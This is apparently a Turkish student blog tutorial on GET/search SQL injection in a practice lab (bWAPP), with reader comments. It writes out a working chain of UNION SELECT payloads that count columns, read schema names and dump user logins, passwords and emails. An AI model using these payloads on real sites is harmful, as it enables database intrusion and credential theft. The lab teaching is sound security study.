68mKJpIYt6QLWDrfo5B1gnz3gMbYPf4 İçeriğe geç

SQL Injection Get/Search

SQL İnjection (Get/Search)

Web sitesi uygulamasında istekler GET metoduyla iletiliyorsa URL kısmında açıkça görülür. Bir arama çubuğunda filtreleme olup olmadığı ile ilgili cevap almak istiyorsak bir girdi yazmamız yeterli. Eğer SQL hatası alırsak burada filtreleme yoktur. Bu sebeple veritabanına erişebiliriz.

a’ girdisiyle işlem yapıyorum. Görüldüğü gibi hata aldık burada SQL hatası verdi.

Burada yapmamız gereken şey ise sütun sayısını bulmamızdır. Sütun  sayısını order by 1,2,3,4,5,6,7,8,9,10– – metoduyla bulabiliriz. Ekran 8. sütun da hata verdi böyle bir sütun yoktur diye. Yani 7 sütundan oluşuyor.

Kolon sayısı bilgisine eriştikten sonra a’ union select 1,2,3,4,5,6,7– – ile sütunlarımızı sınıflandırıyoruz.

a’ union select 1,2,3,4,database(),6,7– – ile veritabanına erişiyoruz.

a’ union select 1,2,3,4,version(),6,7– – ile versiyonuna erişiyoruz.

a’ union select 1,2,3,4,group_concat(table_name),6,7 from information_schema.tables where table_schema=database()– – ile burada bizi asıl ilgilendiren user kısmı. Şimdide kullanıcılar kısmında ki veritabanına erişelim

a’ union select 1,2,3,4,(column_name) ,6,7 from information_schema.columns where table_name=” users ” — –  ile kullanıcılara eriştik şimdide yapmamız gereken şey şifrelerini çekebilirmiyiz bakalım.

 a’ union select 1,2,login,password,email,6,7 from users — – ile şifreleri çekebildik

YouTube linkine buradan ulaşabilirsiniz.

Tarih:SQL Injection

2 Yorum

  1. Yeşim Yeşim

    Hocam iyi günler. Çok sık sayfanıza bakıyorum ve takip ediyorum sizleri. Sizden bir ricam var. bwapp kullanımını daha detaylı bir şekilde paylaşır mısınız? Veyahut Neler yapabilirim nasıl yapabilirim. Çok türkçe kaynak yok sizlerden yardım istiyorum. Saygı ve sevgilerimle

    • Elimden geldiğince içerik atmaya çalışıyorum bende öğrenciyim ödevler projeler sınavlar derken zaman kalmayabiliyor.Yaşadığın problemi veya sorunu instagram e-mail üzerinden bildirirsen yardımcı olmaya çalışırım.

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir